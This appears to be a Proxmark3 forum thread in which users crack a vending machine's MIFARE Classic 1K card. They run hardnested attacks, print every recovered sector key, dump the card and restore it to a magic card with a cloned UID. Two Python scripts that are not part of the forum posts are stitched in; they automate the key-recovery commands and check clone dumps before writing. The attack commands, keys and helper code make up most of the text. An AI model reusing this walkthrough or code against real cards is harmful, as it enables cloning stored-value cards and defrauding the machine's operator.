Research, development and trades concerning the powerful Proxmark3 device.
Hello people! My friend and I have some questions on how to hack a vending machine MIFARE Classic 1k.
The MIFARE in question is a hardnested type.
With a weak pseudorandom number generator we didn't have any kind of problems.
But with hardnested we are asking ourselves if we are doing a good job.
So first of all we search for the high-frequency MIFARE and get the following:
proxmark3> hf se
UID : 7b 0d 92 22
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: HARDENED (hardnested)
Valid ISO14443A Tag Found - Quiting Search
Then we try to check it with the default keys as usual ... but it seems pretty locked
proxmark3> hf mf chk * ?
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9
To cancel this operation press the button on the proxmark...
--o
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
|001| ffffffffffff | 0 | ffffffffffff | 0 |
|002| ffffffffffff | 0 | ffffffffffff | 0 |
|003| ffffffffffff | 0 | ffffffffffff | 0 |
|004| ffffffffffff | 0 | ffffffffffff | 0 |
|005| ffffffffffff | 0 | ffffffffffff | 0 |
|006| ffffffffffff | 0 | ffffffffffff | 0 |
|007| ffffffffffff | 0 | ffffffffffff | 0 |
|008| ffffffffffff | 0 | ffffffffffff | 0 |
|009| ffffffffffff | 0 | ffffffffffff | 0 |
|010| ffffffffffff | 0 | ffffffffffff | 0 |
|011| ffffffffffff | 0 | ffffffffffff | 0 |
|012| ffffffffffff | 0 | ffffffffffff | 0 |
|013| ffffffffffff | 0 | ffffffffffff | 0 |
|014| ffffffffffff | 0 | ffffffffffff | 0 |
|015| ffffffffffff | 0 | ffffffffffff | 0 |
|---|----------------|---|----------------|---|
So the first thing I think is ... well, let's try the hardnested attack with a0a1a2a3a4a5! And it gives me the key eae8968d5c70!
proxmark3> hf mf hard * A a0a1a2a3a4a5 10 A
--target block no: 10, target key type:A, known target key: 0x000000000000 (not set), file action: none, Slow: No, Tests: 0
Using AVX2 SIMD core.

 time    | #nonces | Activity                                             | expected to brute force
         |         |                                                      | #states         | time
----------------------------------------------------------------------------------------------------
       0 |       0 | Start using 4 threads and AVX2 SIMD core             |                 |
       0 |       0 | Brute force benchmark: 341 million (2^28.3) keys/s   | 140737488355328 |    5d
       1 |       0 | Using 235 precalculated bitflip state tables         | 140737488355328 |    5d
...
      20 |    1440 | Apply bit flip properties                            |     15487296512 |   45s
      20 |    1440 | (Ignoring Sum(a8) properties)                        |     15487296512 |   45s
      29 |    1440 | Starting brute force...                              |     15487296512 |   45s
      95 |    1440 | Brute force phase completed. Key found: eae8968d5c70 |               0 |    0s

proxmark3> hf mf hard * A ffffffffffff 20 A
--target block no: 20, target key type:A, known target key: 0x000000000000 (not set), file action: none, Slow: No, Tests: 0
Using AVX2 SIMD core.

 time    | #nonces | Activity                                             | expected to brute force
         |         |                                                      | #states         | time
----------------------------------------------------------------------------------------------------
       0 |       0 | Start using 4 threads and AVX2 SIMD core             |                 |
       0 |       0 | Brute force benchmark: 350 million (2^28.4) keys/s   | 140737488355328 |    5d
       1 |       0 | Using 235 precalculated bitflip state tables         | 140737488355328 |    5d
#db# Authentication failed. Card timeout.
... and here is the question: what commands should I launch now?
Am I doing this right?
What do I need to do now, if I need to emulate it afterwards?
Thank you for your collaboration.
Forgot to mention, I then added the key that was found to default_keys.dic and executed:
hf mf chk * ? ./default_keys.dic, which gave me this result:
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
|001| ffffffffffff | 0 | ffffffffffff | 0 |
|002| eae8968d5c70 | 1 | ffffffffffff | 0 |
|003| ffffffffffff | 0 | ffffffffffff | 0 |
|004| ffffffffffff | 0 | ffffffffffff | 0 |
|005| ffffffffffff | 0 | ffffffffffff | 0 |
|006| ffffffffffff | 0 | ffffffffffff | 0 |
|007| ffffffffffff | 0 | ffffffffffff | 0 |
|008| ffffffffffff | 0 | ffffffffffff | 0 |
|009| ffffffffffff | 0 | ffffffffffff | 0 |
|010| ffffffffffff | 0 | ffffffffffff | 0 |
|011| ffffffffffff | 0 | ffffffffffff | 0 |
|012| ffffffffffff | 0 | ffffffffffff | 0 |
|013| ffffffffffff | 0 | ffffffffffff | 0 |
|014| ffffffffffff | 0 | ffffffffffff | 0 |
|015| ffffffffffff | 0 | ffffffffffff | 0 |
|---|----------------|---|----------------|---|
So I am continuing to launch these commands, every time increasing the block number by 4:
hf mf hard * A a0a1a2a3a4a5 0 A
.............
hf mf hard * A a0a1a2a3a4a5 4 A
and every time I am adding the discovered key to default_keys.dic, and by launching hf mf chk * ? ./default_keys.dic the output is:
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
|001| e96df21719be | 1 | ffffffffffff | 0 |
|002| eae8968d5c70 | 1 | fa96f7ca8711 | 1 |
|003| ebba460cc639 | 1 | ffffffffffff | 0 |
|004| ec35e167359b | 1 | ffffffffffff | 0 |
|005| edaf6fdb9ed9 | 1 | ffffffffffff | 0 |
|006| eed4781b585a | 1 | ffffffffffff | 0 |
|007| ef79fbce8bce | 1 | ffffffffffff | 0 |
|008| e06a8a878a21 | 1 | ffffffffffff | 0 |
|009| ffffffffffff | 0 | ffffffffffff | 0 |
|010| e2c737ed3316 | 1 | ffffffffffff | 0 |
|011| e3f90ff4ba70 | 1 | ffffffffffff | 0 |
|012| e48172f43898 | 1 | ffffffffffff | 0 |
|013| ffffffffffff | 0 | ffffffffffff | 0 |
|014| ffffffffffff | 0 | ffffffffffff | 0 |
|015| ffffffffffff | 0 | ffffffffffff | 0 |
|---|----------------|---|----------------|---|
Needless to say, I am continuing even if I don't know whether I am doing something right.
If someone could tell me whether I am doing something wrong, I would be happy to follow.
Last edited by apotere (2018-10-31 21:17:33)
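The sector-by-sector loop described in the post above (run hardnested against one block of each still-unknown sector, append the recovered key to the dictionary, re-run chk) is easy to lose track of by hand. The following is an added example, not code from the original post or from the Proxmark3 project: it parses the key table the old proxmark3 client prints for `hf mf chk`, lists which sector/key-type pairs are still unknown, emits one `hf mf hard` line per missing key in the positional form the thread uses (`<block> <A|B> <known key> <target block> <A|B>`), and produces the distinct keys to put in default_keys.dic. The known key has to be one that actually authenticates: the chk table reports a0a1a2a3a4a5 for sector 0 key A, and the run in the thread that passed ffffffffffff instead ended in "Authentication failed". The embedded table is copied from the post (the state where sectors 9 and 13 to 15 and most key B slots were still open); the block numbers assume a 1K card with four blocks per sector.

```python
"""Bookkeeping for a sector-by-sector MIFARE Classic 1K key recovery.

Added example, not from the original post or the Proxmark3 project.
"""
import re

# Key table as printed by the old client's `hf mf chk` (copied from the thread).
CHK_TABLE_FROM_THREAD = """\
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
|001| e96df21719be | 1 | ffffffffffff | 0 |
|002| eae8968d5c70 | 1 | fa96f7ca8711 | 1 |
|003| ebba460cc639 | 1 | ffffffffffff | 0 |
|004| ec35e167359b | 1 | ffffffffffff | 0 |
|005| edaf6fdb9ed9 | 1 | ffffffffffff | 0 |
|006| eed4781b585a | 1 | ffffffffffff | 0 |
|007| ef79fbce8bce | 1 | ffffffffffff | 0 |
|008| e06a8a878a21 | 1 | ffffffffffff | 0 |
|009| ffffffffffff | 0 | ffffffffffff | 0 |
|010| e2c737ed3316 | 1 | ffffffffffff | 0 |
|011| e3f90ff4ba70 | 1 | ffffffffffff | 0 |
|012| e48172f43898 | 1 | ffffffffffff | 0 |
|013| ffffffffffff | 0 | ffffffffffff | 0 |
|014| ffffffffffff | 0 | ffffffffffff | 0 |
|015| ffffffffffff | 0 | ffffffffffff | 0 |
|---|----------------|---|----------------|---|
"""

ROW = re.compile(
    r"\|(\d{3})\|\s*([0-9a-fA-F]{12})\s*\|\s*([01])\s*\|\s*([0-9a-fA-F]{12})\s*\|\s*([01])\s*\|"
)
BLOCKS_PER_SECTOR = 4  # MIFARE Classic 1K: 16 sectors x 4 blocks


def parse_chk_table(text):
    """Return {sector: {"A": key_or_None, "B": key_or_None}}.

    A key counts as recovered only when its res column is 1; with res 0 the
    printed key is just a placeholder, not a key that authenticated.
    """
    table = {}
    for m in ROW.finditer(text):
        sector, ka, ra, kb, rb = m.groups()
        table[int(sector)] = {
            "A": ka.lower() if ra == "1" else None,
            "B": kb.lower() if rb == "1" else None,
        }
    return table


def first_block(sector):
    """Block number to target for a sector (keys are per sector, any block works)."""
    return sector * BLOCKS_PER_SECTOR


def missing_keys(table):
    """(sector, key type) pairs that still have no recovered key."""
    return [(s, t) for s in sorted(table) for t in ("A", "B") if table[s][t] is None]


def hardnested_commands(table, known_sector=0, known_type="A"):
    """One old-client `hf mf hard` line per missing key, using a key that authenticated."""
    known = table.get(known_sector, {}).get(known_type)
    if known is None:
        raise ValueError("the known key must come from a sector that authenticated")
    blk = first_block(known_sector)
    return [f"hf mf hard {blk} {known_type} {known} {first_block(s)} {t}"
            for s, t in missing_keys(table)]


def dictionary_keys(table):
    """Distinct recovered keys, sorted, one per line for default_keys.dic."""
    return sorted({k for row in table.values() for k in row.values() if k})


if __name__ == "__main__":
    t = parse_chk_table(CHK_TABLE_FROM_THREAD)
    print("\n".join(hardnested_commands(t)))
    print("\n".join(dictionary_keys(t)))
```

Each recovered key should be appended to the dictionary and the table re-parsed from the next `hf mf chk` run, so the command list shrinks as sectors close; a key B recovered for a sector is as good a known key as a key A.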
Now that I have got all the keys for all the blocks:
hf mf chk * ? ./default_keys.dic
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | f8a4e8d9f4a1 | 1 |
|001| e96df21719be | 1 | f9166635409a | 1 |
|002| eae8968d5c70 | 1 | fa96f7ca8711 | 1 |
|003| ebba460cc639 | 1 | fbe05a0fc474 | 1 |
|004| ec35e167359b | 1 | fca7e1b85fcf | 1 |
|005| edaf6fdb9ed9 | 1 | fd1f82ab8613 | 1 |
|006| eed4781b585a | 1 | fecf0f1f927e | 1 |
|007| ef79fbce8bce | 1 | ffd0e0d3d4dc | 1 |
|008| e06a8a878a21 | 1 | f0f17ba7db5c | 1 |
|009| e18f1bfeffbb | 1 | f117de730420 | 1 |
|010| e2c737ed3316 | 1 | f2925a13b3d8 | 1 |
|011| e3f90ff4ba70 | 1 | f3c8f8c4ff92 | 1 |
|012| e48172f43898 | 1 | f4f99dcb9d8a | 1 |
|013| e58279d9ff09 | 1 | f5068427a2c4 | 1 |
|014| e66023533727 | 1 | f6c9f83b0b24 | 1 |
|015| e752a5b81cf5 | 1 | f76796010efd | 1 |
|---|----------------|---|----------------|---|
How can I dump them to a bin file?
Pretty good website:
https://scund00r.com/all/rfid/2018/06/0 … sheet.html has all that I needed to emulate the vendor key.
Have a good day!
So now I am trying to restore the dump to another card that arrived with the Proxmark:
hf mf restore
Restoring dumpdata.bin to card
Writing to block 0: 7b 0d 92 22 c6 88 04 00 c8 18 00 20 00 00 00 14
#db# Cmd Error: 04
#db# Write block error
#db# WRITE BLOCK FINISHED
isOk:00
Writing to block 1: 7b 00 26 88 26 88 00 00 00 00 00 00 00 00 00 00
#db# WRITE BLOCK FINISHED
isOk:01
Writing to block 2: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#db# WRITE BLOCK FINISHED
isOk:01
But on the first block [0] I get this error: #db# Cmd Error: 04
Can someone advise?
Hello there!
We managed to restore the data on a Chinese magic MIFARE and we managed to set the "fake" UID.
Now if we try to restore the data or to write to a block it gives this error:
#db# Authentication failed. Card timeout.
#db# Auth error
#db# WRITE BLOCK FINISHED
Can someone tell me how to wipe it to 0 so I can restore it one more time, or how I can find the key needed to write a specific block to the card?
Thank you
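Two things in the restore posts above are worth checking offline before any write goes to a card: block 0 is the manufacturer block, writable only on a magic card (a write to it on a genuine card fails, as the "Cmd Error" in the first restore shows), and every sector trailer carries three access bytes whose nibbles must be mutually consistent, otherwise a genuine card locks that sector for good. The following is an added example, not code from the original posts or from the Proxmark3 project. It rebuilds a 1K dump in memory from material on the page: block 0 is the line the thread's restore printed (its BCC byte 0xc6 is the XOR of the four UID bytes 7b 0d 92 22, and the ATQA the card reported as 00 04 sits in block 0 as 04 00), the keys of sectors 0 to 2 come from the final chk table, and every other key together with all access bytes (ff 07 80 69, the transport configuration) are constructed placeholders.

```python
"""Offline sanity checks on a MIFARE Classic 1K dump before `hf mf restore`.

Added example, not from the original posts or the Proxmark3 project.
"""

# Block 0 exactly as the thread's restore printed it.
BLOCK0_FROM_THREAD = "7b 0d 92 22 c6 88 04 00 c8 18 00 20 00 00 00 14"
REPORTED_ATQA = "0004"  # as shown by `hf se` in the thread
# Sector keys (A, B) from the thread's final chk table; other sectors are
# constructed placeholders below.
KEYS_FROM_THREAD = {
    0: ("a0a1a2a3a4a5", "f8a4e8d9f4a1"),
    1: ("e96df21719be", "f9166635409a"),
    2: ("eae8968d5c70", "fa96f7ca8711"),
}
DEFAULT_ACCESS = bytes.fromhex("ff078069")  # constructed: transport configuration
SECTORS, BLOCKS_PER_SECTOR, BLOCK_LEN = 16, 4, 16


def parse_block(line):
    return bytes.fromhex(line.replace(" ", ""))


def bcc(uid):
    """Block check character: XOR of the four UID bytes."""
    v = 0
    for b in uid:
        v ^= b
    return v


def check_block0(block0, atqa_hex):
    """Problems in the manufacturer block relative to what the card reports."""
    issues = []
    if bcc(block0[:4]) != block0[4]:
        issues.append(f"BCC mismatch: expected {bcc(block0[:4]):02x}, dump has {block0[4]:02x}")
    if block0[6:8] != bytes.fromhex(atqa_hex)[::-1]:  # stored least significant byte first
        issues.append(f"ATQA mismatch: dump has {block0[6:8].hex()}")
    return issues


def access_bits_consistent(trailer):
    """Bytes 6-8 hold C1/C2/C3 plus their inverted copies; all must agree."""
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0xF, b8 >> 4
    return (b6 & 0xF) == (c1 ^ 0xF) and (b6 >> 4) == (c2 ^ 0xF) and (b7 & 0xF) == (c3 ^ 0xF)


def decode_access_bits(trailer):
    """(C1, C2, C3) for blocks 0..3 of the sector; block 3 is the trailer itself."""
    b7, b8 = trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0xF, b8 >> 4
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]


def trailer_offset(sector):
    return (sector * BLOCKS_PER_SECTOR + BLOCKS_PER_SECTOR - 1) * BLOCK_LEN


def build_dump():
    """Constructed 1024-byte dump: page's block 0 and keys, placeholder elsewhere."""
    dump = bytearray(SECTORS * BLOCKS_PER_SECTOR * BLOCK_LEN)
    dump[0:BLOCK_LEN] = parse_block(BLOCK0_FROM_THREAD)
    for s in range(SECTORS):
        ka, kb = KEYS_FROM_THREAD.get(s, ("ffffffffffff", "ffffffffffff"))
        off = trailer_offset(s)
        dump[off:off + BLOCK_LEN] = bytes.fromhex(ka) + DEFAULT_ACCESS + bytes.fromhex(kb)
    return bytes(dump)


def validate_dump(dump, atqa_hex):
    """All issues found; an empty list means the dump is safe to write."""
    if len(dump) != SECTORS * BLOCKS_PER_SECTOR * BLOCK_LEN:
        return [f"unexpected dump size {len(dump)}"]
    issues = check_block0(dump[:BLOCK_LEN], atqa_hex)
    for s in range(SECTORS):
        off = trailer_offset(s)
        if not access_bits_consistent(dump[off:off + BLOCK_LEN]):
            issues.append(f"sector {s}: access bits inconsistent")
    return issues


if __name__ == "__main__":
    d = build_dump()
    print(validate_dump(d, REPORTED_ATQA) or "dump looks consistent")
    print("sector 1 trailer access bits:", decode_access_bits(d[trailer_offset(1):trailer_offset(1) + 16]))
```

Run the same `validate_dump` over the real dumpdata.bin before `hf mf restore`; the write to block 0 still needs a magic card, and the keys used for the write must match what the trailers of the target card currently hold, not what the dump says.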
Hello, can you tell me which commands you have to use with the Proxmark to be able to read the keys on a MIFARE Classic?
Honestly I cannot understand what commands you have to enter so that it gives me all the keys and all the blocks. I don't know how to do it; can you help me please?